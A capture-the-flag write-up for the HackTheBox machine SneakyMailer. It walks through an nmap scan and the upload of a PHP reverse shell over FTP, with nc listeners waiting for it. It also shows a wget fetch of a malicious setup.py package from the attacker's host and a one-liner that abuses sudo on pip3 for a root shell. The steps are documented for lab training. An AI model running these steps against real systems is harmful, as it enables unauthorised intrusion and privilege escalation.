Hackthebox — SneakyMailer

Summary

Today we have another retired Linux machine, SneakyMailer, with IP 10.10.10.197.

Enumeration

Nmap

root@strike:~# nmap -sC -sV 10.10.10.197
Starting Nmap 7.70 ( https://nmap.org ) at 2020-07-12 17:40 EET
Nmap scan report for 10.10.10.197
Host is up (0.11s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 57:c9:00:35:36:56:e6:6f:f6:de:86:40:b2:ee:3e:fd (RSA)
| 256 d8:21:23:28:1d:b8:30:46:e2:67:2d:59:65:f0:0a:05 (ECDSA)
|_ 256 5e:4f:23:4e:d4:90:8e:e9:5e:89:74:b3:19:0c:fc:1a (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: debian, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING,
80/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Did not follow redirect to http://sneakycorp.htb
143/tcp open imap Courier Imapd (released 2018)
|_imap-capabilities: STARTTLS NAMESPACE UTF8=ACCEPTA0001 UIDPLUS ENABLE ACL IDLE THREAD=REFERENCES ACL2=UNION THREAD=ORDEREDSUBJECT completed IMAP4rev1 CAPABILITY OK SORT CHILDREN QUOTA
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Not valid before: 2020-05-14T17:14:21
|_Not valid after: 2021-05-14T17:14:21
|_ssl-date: TLS randomness does not represent time
993/tcp open ssl/imap Courier Imapd (released 2018)
|_imap-capabilities: NAMESPACE UTF8=ACCEPTA0001 UIDPLUS AUTH=PLAIN ACL IDLE THREAD=REFERENCES ACL2=UNION THREAD=ORDEREDSUBJECT completed CAPABILITY IMAP4rev1 OK ENABLE SORT CHILDREN QUOTA
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Not valid before: 2020-05-14T17:14:21
|_Not valid after: 2021-05-14T17:14:21
|_ssl-date: TLS randomness does not represent time
8080/tcp open http nginx 1.14.2
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: nginx/1.14.2
|_http-title: Welcome to nginx!
Service Info: Host: debian; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.70 seconds
root@strike:~#

That is a lot of open ports for a Linux machine: FTP, SSH, SMTP, two HTTP servers (80 and 8080) and IMAP on 143 and 993, which fits the "Mailer" in the name. Two details from the scan are worth noting before going further: port 80 redirects to http://sneakycorp.htb, so that name has to go into /etc/hosts before browsing, and Postfix advertises VRFY, which lets a client check whether a mailbox exists.

Web

Browsing the site, I found the page team.php.

With the developer credentials I connected to the FTP service and uploaded secwalk.php, a PHP reverse shell, into the dev directory:

root@strike:~# ftp 10.10.10.197
Connected to 10.10.10.197.
220 (vsFTPd 3.0.3)
Name (10.10.10.197:root): developer
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd dev
250 Directory successfully changed.
ftp> mput secwalk.php
mput secwalk.php? yes
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
5490 bytes sent in 0.00 secs (54.5382 MB/s)
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 4096 May 26 19:52 css
drwxr-xr-x 2 0 0 4096 May 26 19:52 img
-rwxr-xr-x 1 0 0 13742 Jun 23 09:44 index.php
drwxr-xr-x 3 0 0 4096 May 26 19:52 js
drwxr-xr-x 2 0 0 4096 May 26 19:52 pypi
drwxr-xr-x 4 0 0 4096 May 26 19:52 scss
--wxrw-rw- 1 1001 1001 5490 Jul 16 10:40 secwalk.php
-rwxr-xr-x 1 0 0 26523 May 26 20:58 team.php
drwxr-xr-x 8 0 0 4096 May 26 19:52 vendor
226 Directory send OK.
ftp>

Start a listener on port 4142 first (nc -lnvp 4142), then open the uploaded file in the browser so the PHP reverse shell connects back.

After creating the two files of the package (setup.py and .pypirc) on our machine and serving them over HTTP on port 8000, we need to fetch them onto the target:

developer@sneakymailer:/tmp$ wget -r --no-parent http://10.10.15.33:8000/pypi-pkg
--2020-07-16 10:42:48-- http://10.10.15.33:8000/pypi-pkg
Connecting to 10.10.15.33:8000... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: /pypi-pkg/ [following]
--2020-07-16 10:42:49-- http://10.10.15.33:8000/pypi-pkg/
Connecting to 10.10.15.33:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 266 [text/html]
Saving to: ‘10.10.15.33:8000/pypi-pkg’

10.10.15. 0%[ ] 0 --.-KB/s 10.10.15.33:8000/py 100%[===================>] 266 --.-KB/s in 0s

2020-07-16 10:42:49 (6.19 MB/s) - ‘10.10.15.33:8000/pypi-pkg’ saved [266/266]

Loading robots.txt; please ignore errors.
--2020-07-16 10:42:49-- http://10.10.15.33:8000/robots.txt
Connecting to 10.10.15.33:8000... connected.
HTTP request sent, awaiting response... 404 File not found
2020-07-16 10:42:49 ERROR 404: File not found.

--2020-07-16 10:42:49-- http://10.10.15.33:8000/pypi-pkg/.pypirc
Connecting to 10.10.15.33:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 128 [application/octet-stream]
Saving to: ‘10.10.15.33:8000/pypi-pkg/.pypirc’

10.10.15. 0%[ ] 0 --.-KB/s 10.10.15.33:8000/py 100%[===================>] 128 --.-KB/s in 0s

2020-07-16 10:42:49 (3.21 MB/s) - ‘10.10.15.33:8000/pypi-pkg/.pypirc’ saved [128/128]

--2020-07-16 10:42:49-- http://10.10.15.33:8000/pypi-pkg/setup.py
Connecting to 10.10.15.33:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 565 [text/plain]
Saving to: ‘10.10.15.33:8000/pypi-pkg/setup.py’

10.10.15. 0%[ ] 0 --.-KB/s 10.10.15.33:8000/py 100%[===================>] 565 --.-KB/s in 0s

2020-07-16 10:42:49 (14.4 MB/s) - ‘10.10.15.33:8000/pypi-pkg/setup.py’ saved [565/565]

FINISHED --2020-07-16 10:42:49--
Total wall clock time: 1.0s
Downloaded: 3 files, 959 in 0s (7.86 MB/s)

The files are in place:

developer@sneakymailer:/tmp$ ls
10.10.15.33:8000
systemd-private-859f3cb0b4ff454aab770ad4a719628d-systemd-timesyncd.service-CZ3mlI
vmware-root_458-834774610
developer@sneakymailer:/tmp$ cd 10.10.15.33:8000
developer@sneakymailer:/tmp/10.10.15.33:8000$ ls
pypi-pkg
developer@sneakymailer:/tmp/10.10.15.33:8000$ cd pypi-pkg
developer@sneakymailer:/tmp/10.10.15.33:8000/pypi-pkg$ ls -a
. .. setup.py .pypirc

Start a listener on port 2345 to catch the shell that will come back as the user low:

root@strike:~# nc -lnvp 2345
listening on [any] 2345 ...

Now we need to get the package executed: upload it with the repository credentials stored in .pypirc, and when the package is installed on the box the code in setup.py runs and connects back to our listener.

And we got the shell as low.

Grab the user flag!

Privilege Escalation

low@sneakymailer:~$ sudo -l
sudo: unable to resolve host sneakymailer: Temporary failure in name resolution
Matching Defaults entries for low on sneakymailer:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User low may run the following commands on sneakymailer:
(root) NOPASSWD: /usr/bin/pip3
low@sneakymailer:~$

After some searching I found a blog post on abusing sudo rights on pip3 (the same trick is documented on GTFOBins). It works because pip installs a package by running its setup.py as a script, so with NOPASSWD sudo a setup.py we control executes as root:

low@sneakymailer:~$ TF=$(mktemp -d)
low@sneakymailer:~$ echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
low@sneakymailer:~$ sudo pip3 install $TF
sudo: unable to resolve host sneakymailer: Temporary failure in name resolution
Processing /tmp/tmp.tQid5dJuNf
# bash
root@sneakymailer:/tmp/pip-req-build-9k8kjhct#

Grab the root flag!

If you learned anything useful from this write-up, give me respect on HackTheBox.

Thanks for your time!

Ahmed Samir
CTFer | Computer Science Student